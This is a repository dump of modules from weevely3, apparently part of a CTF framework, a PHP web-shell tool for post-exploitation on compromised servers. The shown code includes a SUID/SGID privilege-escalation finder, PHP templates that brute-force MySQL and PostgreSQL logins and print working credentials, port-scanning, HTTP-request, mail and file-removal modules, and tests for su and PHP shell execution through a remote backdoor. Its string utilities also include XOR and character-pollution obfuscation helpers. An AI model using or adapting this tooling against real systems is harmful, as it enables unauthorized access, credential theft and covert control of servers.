ShellCmd 2 | from core.module import Module 3 | 4 | class Suidsgid(Module): 5 | 6 | """Find files with SUID or SGID flags.""" 7 | 8 | def init(self): 9 | 10 | self.register_info( 11 | { 12 | 'author': [ 13 | 'Emilio Pinna' 14 | ], 15 | 'license': 'GPLv3' 16 | } 17 | ) 18 | 19 | self.register_arguments([ 20 | { 'name' : 'rpath', 'help' : 'Remote starting path', 'default' : '/' }, 21 | { 'name' : '-only-suid', 'help' : 'Find only suid', 'action' : 'store_true', 'default' : False }, 22 | { 'name' : '-only-sgid', 'help' : 'Find only sgid', 'action' : 'store_true', 'default' : False }, 23 | ]) 24 | 25 | def run(self): 26 | 27 | result = ShellCmd( 28 | payload = """find ${rpath} -type f ${ '-perm -04000' if not only_sgid else '' } ${ '-o' if not only_suid and not only_sgid else '' } ${ '-perm -02000' if not only_suid else '' }""", 29 | arguments = [ 30 | "-stderr_redirection", 31 | " 2>/dev/null", 32 | ]).run(self.args) 33 | 34 | if result: 35 | return result.split('\n') 36 | -------------------------------------------------------------------------------- /utils/weevely3/modules/backdoor/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/backdoor/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/backdoor/_reversetcp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/backdoor/_reversetcp/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/bruteforce/__init__.py: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/bruteforce/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/bruteforce/_sql/mysql.tpl: -------------------------------------------------------------------------------- 1 | <%! import json %> 2 | 3 | ini_set('mysql.connect_timeout',1); 4 | $users=array ( 5 | % for u in users: 6 | ${ json.dumps(u) }, 7 | % endfor 8 | ); 9 | $pwds=array ( 10 | % for p in pwds: 11 | ${ json.dumps(p) }, 12 | % endfor 13 | ); 14 | 15 | foreach($users as $u) { 16 | foreach($pwds as $p) { 17 | $c=@mysql_connect("${ hostname }", "$u", "$p"); 18 | if($c){ 19 | print("$u:$p".PHP_EOL); 20 | break; 21 | } 22 | } 23 | }mysql_close(); 24 | -------------------------------------------------------------------------------- /utils/weevely3/modules/bruteforce/_sql/pgsql.tpl: -------------------------------------------------------------------------------- 1 | <%! 
import json %> 2 | 3 | $users=array ( 4 | % for u in users: 5 | ${ json.dumps(u) }, 6 | % endfor 7 | ); 8 | $pwds=array ( 9 | % for p in pwds: 10 | ${ json.dumps(p) }, 11 | % endfor 12 | ); 13 | 14 | foreach($users as $u) { 15 | foreach($pwds as $p) { 16 | $c=@pg_connect("host=${ hostname } user=$u password=$p connect_timeout=1"); 17 | if($c){ 18 | print("$u:$p".PHP_EOL); 19 | break; 20 | } 21 | } 22 | }pg_close(); 23 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/file/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/file/_tar/php_tar.tpl: -------------------------------------------------------------------------------- 1 | <%include file="EasyTar.class.php"/> 2 | 3 | $f='set_time_limit'&&is_callable($f)&&$f(0); 4 | $f='ini_set'&&is_callable($f)&&$f('max_execution_time', 0); 5 | $a = new tar; 6 | 7 | $z = '${ rtar }'; 8 | 9 | $fs=array ( 10 | % for f in rfiles: 11 | '${ f }', 12 | % endfor 13 | ); 14 | 15 | ## Here decompress 16 | % if decompress: 17 | 18 | if(!file_exists($z) || !is_readable($z)) { 19 | print("Skipping file '$z', check existance and permission"); 20 | } 21 | else { 22 | $a->extractTar($z, '${ rfiles[0] if rfiles and rfiles[0] else '.' 
}'); 23 | } 24 | 25 | ## Here compress 26 | % else: 27 | 28 | if(file_exists($z)) { 29 | print("File '$z' already exists, skipping compressing"); 30 | } 31 | else { 32 | $a->makeTar($fs, $z); 33 | } 34 | 35 | ## Since makeTar does not complain for missing $z, just double 36 | ## check the existance of the zipped file and print generic error message 37 | if(!file_exists($z)) { 38 | print("File '$z' not created, check existance and permission"); 39 | } 40 | 41 | % endif 42 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/_zip/php_zip.tpl: -------------------------------------------------------------------------------- 1 | <%include file="EasyZip.class.php"/> 2 | 3 | $f='set_time_limit'&&is_callable($f)&&$f(0); 4 | $f='ini_set'&&is_callable($f)&&$f('max_execution_time', 0); 5 | $a = new zip; 6 | 7 | $z = '${ rzip }'; 8 | 9 | $fs=array ( 10 | % for f in rfiles: 11 | '${ f }', 12 | % endfor 13 | ); 14 | 15 | ## Here decompress 16 | % if decompress: 17 | 18 | if(!file_exists($z) || !is_readable($z)) { 19 | print("Skipping file '$z', check existance and permission"); 20 | } 21 | else { 22 | $a->extractZip($z, '${ rfiles[0] if rfiles and rfiles[0] else '.' 
}'); 23 | } 24 | 25 | ## Here compress 26 | % else: 27 | 28 | if(file_exists($z)) { 29 | print("File '$z' already exists, skipping compressing"); 30 | } 31 | else { 32 | $a->makeZip($fs, $z); 33 | } 34 | 35 | ## Since makeZip does not complain for missing $z, just double 36 | ## check the existance of the zipped file and print generic error message 37 | if(!file_exists($z)) { 38 | print("File '$z' not created, check existance and permission"); 39 | } 40 | 41 | % endif 42 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/ls.py: -------------------------------------------------------------------------------- 1 | from core.vectors import PhpCode 2 | from core.module import Module 3 | from core.loggers import log 4 | from core import messages 5 | import random 6 | 7 | 8 | class Ls(Module): 9 | 10 | """List directory content.""" 11 | 12 | aliases = [ 'ls', 'dir' ] 13 | 14 | def init(self): 15 | 16 | self.register_info( 17 | { 18 | 'author': [ 19 | 'Emilio Pinna' 20 | ], 21 | 'license': 'GPLv3' 22 | } 23 | ) 24 | 25 | self.register_arguments([ 26 | { 'name' : 'dir', 'help' : 'Target folder', 'nargs' : '?', 'default' : '.' 
} 27 | ]) 28 | 29 | def run(self): 30 | 31 | return PhpCode(""" 32 | $p="${dir}"; 33 | if(@is_dir($p)){ 34 | $d=@opendir($p); 35 | $a=array(); 36 | if($d){ 37 | while(($f=@readdir($d))) $a[]=$f; 38 | sort($a); 39 | print(join(PHP_EOL,$a)); 40 | } 41 | }""", 42 | postprocess = lambda x: x.split('\n') 43 | ).run(self.args) 44 | 45 | def print_result(self, result): 46 | if result: log.info('\n'.join(result)) 47 | -------------------------------------------------------------------------------- /utils/weevely3/modules/file/rm.py: -------------------------------------------------------------------------------- 1 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os 2 | from core.module import Module 3 | from core import modules 4 | 5 | class Rm(Module): 6 | 7 | """Remove remote file.""" 8 | 9 | aliases = [ 'rm' ] 10 | 11 | def init(self): 12 | 13 | self.register_info( 14 | { 15 | 'author': [ 16 | 'Emilio Pinna' 17 | ], 18 | 'license': 'GPLv3' 19 | } 20 | ) 21 | 22 | self.register_arguments([ 23 | { 'name' : 'rpath', 'help' : 'Remote file path' } 24 | ]) 25 | 26 | def run(self): 27 | 28 | # Run unlink 29 | return PhpCode("""(unlink('${rpath}') && print(1)) || print(0);""", 30 | postprocess = lambda x: True if x == '1' else False 31 | ).run(self.args) 32 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/net/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/net/_curl/php_curl.tpl: -------------------------------------------------------------------------------- 1 | $ch = curl_init(); 2 | 3 | curl_setopt($ch, CURLOPT_URL, '${url}'); 4 | 5 | curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "${ request if not data else 'POST' }"); 6 | 
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, ${ connect_timeout }); 7 | 8 | % if header or cookie or user_agent or data: 9 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( 10 | % endif 11 | % for h in header: 12 | % if not (data and (h.title().startswith('Content-Type: ') or h.title().startswith('Content-Length: '))) and not (user_agent and h.title().startswith('User-Agent: ')): 13 | '${h}', 14 | % endif 15 | % endfor 16 | % if cookie: 17 | 'Cookie: ${ cookie }', 18 | % endif 19 | % if user_agent: 20 | "User-Agent: ${ user_agent }", 21 | % endif 22 | % if data: 23 | 'Content-Type: application/x-www-form-urlencoded', 24 | 'Content-Length: ${ len(''.join(data)) }', 25 | % endif 26 | % if header or cookie or user_agent or data: 27 | )); 28 | % endif 29 | 30 | % if data: 31 | curl_setopt($ch, CURLOPT_POST, 1); 32 | curl_setopt($ch, CURLOPT_POSTFIELDS, '${ ''.join(data) }'); 33 | % endif 34 | 35 | curl_setopt($ch, CURLOPT_HEADER, 1); 36 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 37 | $response = curl_exec($ch); 38 | print($response); 39 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/_curl/php_httprequest1.tpl: -------------------------------------------------------------------------------- 1 | if(class_exists('HttpRequest')) { 2 | $r = new HttpRequest('${ url }', HttpRequest::METH_${ request if not data else 'POST' }); 3 | 4 | $r->setOptions(array('connecttimeout'=>${ connect_timeout })); 5 | 6 | % if header or cookie or user_agent or data: 7 | $r->addHeaders( 8 | array( 9 | % for h in header: 10 | % if not (data and (h.title().startswith('Content-Type: ') or h.title().startswith('Content-Length: '))) and not (user_agent and h.title().startswith('User-Agent: ')): 11 | '${ h.split(':')[0] }' => '${ h.split(':')[1].lstrip() }', 12 | % endif 13 | % endfor 14 | % if user_agent: 15 | 'User-Agent'=>'${ user_agent }', 16 | % endif 17 | % if cookie: 18 | 'Cookie'=>'${ cookie }', 19 | % endif 20 | ) 21 | ); 22 | % 
endif 23 | 24 | % if data: 25 | $r->addRawPostData('${ ''.join(data) }'); 26 | % endif 27 | 28 | try { 29 | $r = $r->send(); 30 | } catch (HttpException $ex) { } 31 | 32 | print("HTTP/" . $r->getHttpVersion() . " " . $r->getResponseCode() . " " . $r->getResponseStatus() . "\r\n"); 33 | 34 | foreach($r->getHeaders() as $h => $v) { 35 | print("$h: $v\r\n"); 36 | } 37 | print("\r\n" . $r->getBody()); 38 | } 39 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/_scan/fsockopen.tpl: -------------------------------------------------------------------------------- 1 | $addrs = array( "${ '", "'.join( ips ) }" ); 2 | $ports = array( ${ ', '.join( [ str(p) for p in prts ] ) } ); 3 | 4 | foreach($addrs as $a) { 5 | foreach($ports as $p) { 6 | $n="";$e=""; 7 | if($fp = fsockopen($a, $p, $n, $e, $timeout=${ timeout })) { 8 | print("OPN $a:$p" . PHP_EOL); 9 | fclose($fp); 10 | } 11 | else { 12 | print("ERR $a:$p $e $n" . PHP_EOL); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /utils/weevely3/modules/net/mail.py: -------------------------------------------------------------------------------- 1 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os 2 | from core.module import Module 3 | from core import modules 4 | 5 | class Mail(Module): 6 | 7 | """Send mail.""" 8 | 9 | aliases = [ 'mail' ] 10 | 11 | def init(self): 12 | 13 | self.register_info( 14 | { 15 | 'author': [ 16 | 'appo' 17 | ], 18 | 'license': 'GPLv3' 19 | } 20 | ) 21 | 22 | self.register_arguments([ 23 | { 'name' : 'to', 'help' : 'Receiver, or receivers of the mail' }, 24 | { 'name' : 'subject', 'help' : 'Subject of the mail to be sent. ' }, 25 | { 'name' : 'message', 'help' : 'Message to be sent. ( Write message in " " ) ' }, 26 | { 'name' : 'sender', 'help' : 'Set sender of the mail. 
' } 27 | ]) 28 | 29 | def run(self): 30 | 31 | return PhpCode("""(mail('${to}', '${subject}', '${message}', 'From: ${sender}') && print(1)) || print(0);""", 32 | postprocess = lambda x: True if x == '1' else False 33 | ).run(self.args) 34 | -------------------------------------------------------------------------------- /utils/weevely3/modules/shell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/shell/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/sql/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/sql/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/system/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/system/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/requirements.txt: -------------------------------------------------------------------------------- 1 | prettytable 2 | Mako 3 | PyYAML 4 | python-dateutil 5 | PySocks 6 | 7 | -------------------------------------------------------------------------------- /utils/weevely3/testsuite/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/testsuite/__init__.py -------------------------------------------------------------------------------- 
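# /utils/weevely3/testsuite/test_shell_php.py:
# --------------------------------------------------------------------------------
from testsuite.base_test import BaseTest
from testfixtures import log_capture
from core import modules
from core.sessions import SessionURL
from core import messages
import logging
import os


class ShellPHP(BaseTest):
    """Integration checks for the ``shell_php`` module's ``run_argv`` entry point."""

    def setUp(self):
        """Open a volatile session and bind the module's ``run_argv``.

        ``self.url`` and ``self.password`` are not defined in this file;
        presumably ``BaseTest`` provides them -- confirm there.
        """
        session = SessionURL(self.url, self.password, volatile = True)
        modules.load_modules(session)

        self.run_argv = modules.loaded['shell_php'].run_argv

    @log_capture()
    def test_commands(self, log_captured):
        """Check the returned output and the last logged message for three inputs."""
        self.assertEqual(self.run_argv(["echo(1);"]), "1")

        # In case of some error in the remote PHP execution,
        # both 500 or 200 OK could be returned. In any case
        # this should warn about the missing trailing ';'
        # (the first call above ends with one, this one does not).

        self.assertEqual(self.run_argv(["echo(1)"]), "")
        # Raw string: same pattern text as the original, without the
        # invalid-escape warning that "\(" triggers on newer interpreters.
        self.assertRegexpMatches(log_captured.records[-1].msg,
            messages.module_shell_php.missing_php_trailer_s % r".*echo\(1\)")

        # Check warnings on 404.

        self.assertEqual(self.run_argv(["header('HTTP/1.0 404 Not Found');"]), "")
        self.assertEqual(messages.module_shell_php.error_404_remote_backdoor,
                         log_captured.records[-1].msg)

# --------------------------------------------------------------------------------
# /utils/weevely3/testsuite/test_shell_su.py:
# --------------------------------------------------------------------------------
from testsuite.base_test import BaseTest
from core.weexceptions import ArgparseError
from core.vectors import PhpCode
from core.vectors import Os
from core import modules
from core.sessions import SessionURL
from core import messages
from testsuite.config import su_user, su_passwd
import core.config
import unittest
import logging
import os


# NOTE(review): su_user / su_passwd are read from testsuite.config, so that
# file holds a cleartext account password -- keep it to a throwaway lab
# account and out of version control.
@unittest.skipIf(
    not su_user or not su_passwd,
    "Skip su shell tests")
class ShellSu(BaseTest):
    """Integration checks for ``shell_su``; skipped unless both credentials are set."""

    def setUp(self):
        """Open a volatile session, then cache the vector names and ``run_argv``."""
        self.session = SessionURL(self.url, self.password, volatile = True)
        modules.load_modules(self.session)

        self.vector_list = modules.loaded['shell_su'].vectors.get_names()

        self.run_argv = modules.loaded['shell_su'].run_argv


    def test_param_vector(self):
        """Run ``whoami`` through every vector and expect the configured user name."""

        for vect in self.vector_list:
            # Check correctness of execution
            self.assertEqual(self.run_argv(["-vector", vect, "-u", su_user, su_passwd, "whoami"]).rstrip(), su_user)

# --------------------------------------------------------------------------------
# /utils/weevely3/testsuite/test_system_info.py:
# --------------------------------------------------------------------------------
from testsuite.base_test import BaseTest
from testfixtures import log_capture
from core.weexceptions import ArgparseError
from core import modules
from core.sessions import SessionURL
from core import messages
import logging
import os


class SystemInfo(BaseTest):
    """Integration checks for the ``system_info`` module."""

    def setUp(self):
        """Open a volatile session and bind the module's ``run_argv``."""
        session = SessionURL(self.url, self.password, volatile = True)
        modules.load_modules(session)

        self.run_argv = modules.loaded['system_info'].run_argv

    @log_capture()
    def test_commands(self, log_captured):
        """Check the all-infos dict, a single info value, and an unknown info name."""

        # Get all infos, returns a dict
        vectors_names = [v.name for v in modules.loaded['system_info'].vectors ]
        self.assertEqual(set(self.run_argv([]).keys()), set(vectors_names))

        # Get just one info, returns a string
        self.assertEqual(
            os.path.split(self.run_argv(["-info", "script"]))[1],
            os.path.split(self.path)[1]
        )

        # Pass a nonexistent info name
        self.assertRaises(ArgparseError, self.run_argv, ["-info", "BOGUS"])

# --------------------------------------------------------------------------------
# /utils/weevely3/utils/__init__.py:
# --------------------------------------------------------------------------------
# Importing the submodules here presumably lets callers reach them as
# attributes of the package after a plain package import.
# NOTE(review): these are Python 2 implicit relative imports; under Python 3
# ``import http`` and ``import code`` resolve to the standard-library modules
# instead of the package's own files.
import http
import strings
import prettify
import iputil
import code

# --------------------------------------------------------------------------------
# /utils/weevely3/utils/iputil.py:
# --------------------------------------------------------------------------------
import itertools


def ip_range(input_string):
    """Expand a dotted address whose octets may be ``low-high`` ranges.

    ``'10.10.10.10-12'`` yields ``'10.10.10.10'``, ``'10.10.10.11'`` and
    ``'10.10.10.12'``. This is a generator, so a malformed octet raises
    ``ValueError`` (from ``int``) only once iteration starts.

    Nothing checks the number of octets or the 0-255 bounds, and a wide
    range in several octets multiplies out to a very large product;
    validate the input before passing anything untrusted.
    """
    ranges = []
    for octet in input_string.split('.'):
        # Build a real list: under Python 3 ``map`` returns an iterator,
        # which supports neither ``len()`` nor indexing.
        bounds = [int(part) for part in octet.split('-')]
        if len(bounds) == 2:
            ranges.append(range(bounds[0], bounds[1] + 1))
        else:
            # One value, or any other number of parts, is used as the
            # literal list of values for that octet.
            ranges.append(bounds)

    for address in itertools.product(*ranges):
        yield '.'.join(map(str, address))


def port_range(input_string):
    """Expand a comma-separated port list such as ``'22,23-33'`` into ints.

    ``low-high`` items are inclusive on both ends. No 1-65535 bounds check
    is made, and a non-numeric item raises ``ValueError`` from ``int``.
    """
    ports = []
    for item in input_string.split(','):
        if '-' in item:
            # Adding the position index turns "low-high" into
            # range(low, high + 1), i.e. an inclusive upper bound.
            bounds = [int(part) + index for index, part in enumerate(item.split('-'))]
            # extend() replaces the original sum(..., []), which copied the
            # accumulated list once per item.
            ports.extend(range(*bounds))
        else:
            ports.append(int(item))
    return ports

# --------------------------------------------------------------------------------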
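# /utils/weevely3/utils/strings.py:
# --------------------------------------------------------------------------------
import random
import string
import itertools

# NOTE: every helper below draws from the ``random`` module, a deterministic,
# non-cryptographic generator whose output can be predicted from observed
# values. Do not use these helpers for keys, tokens or passwords.


def randstr(n=4, fixed=True, charset=None):
    """Return a random string of characters taken from *charset*.

    n       -- length of the result; a falsy value returns ''.
    fixed   -- when False, the length is drawn uniformly from 1..n instead.
    charset -- characters to choose from; a falsy value selects ASCII
               letters plus digits.
    """
    if not n:
        return ''

    if not fixed:
        n = random.randint(1, n)

    if not charset:
        # ``string.letters`` was Python 2 only and locale-dependent, so the
        # default alphabet could change with the process locale;
        # ``ascii_letters`` is fixed and exists on Python 2 and 3.
        charset = string.ascii_letters + string.digits

    return ''.join(random.choice(charset) for _ in range(n))


def divide(data, min_size, max_size, split_size):
    """Yield *split_size* consecutive pieces of *data* with random lengths.

    Every piece but the last has a length drawn from
    ``min_size .. size - max_size * i``, where ``size`` is what is still
    unconsumed and ``i`` the number of pieces still to come; the last piece
    is whatever remains. The upper bound only reserves ``max_size``
    characters per later piece, so a piece can be longer than ``max_size``.

    ``random.randint`` raises ``ValueError`` when that interval is empty,
    i.e. when *data* is too short for the requested sizes.
    """
    it = iter(data)
    size = len(data)
    for i in range(split_size - 1, 0, -1):
        s = random.randint(min_size, size - max_size * i)
        yield ''.join(itertools.islice(it, 0, s))
        size -= s
    yield ''.join(it)


def sxor(s1, s2):
    """XOR each character of *s1* with *s2* repeated as a cycling key.

    Applying the same key twice restores the input. This is reversible
    obfuscation, not encryption: known plaintext reveals the key. An empty
    *s2* produces an empty result, because ``zip`` stops immediately.
    """
    return ''.join(
        chr(ord(a) ^ ord(b))
        for a, b in zip(s1, itertools.cycle(s2))
    )


def pollute(data, charset, frequency=0.3):
    """Insert one random *charset* character before some characters of *data*.

    Each character is preceded by a filler with probability *frequency*.
    """
    # Collect the pieces and join once instead of growing a string with +=.
    pieces = []
    for char in data:
        if random.random() < frequency:
            pieces.append(randstr(1, True, charset) + char)
        else:
            pieces.append(char)

    return ''.join(pieces)


def chunks(l, n):
    """Yield successive n-sized chunks from l."""
    # ``xrange`` does not exist on Python 3; ``range`` works on both.
    for i in range(0, len(l), n):
        yield l[i:i+n]

# --------------------------------------------------------------------------------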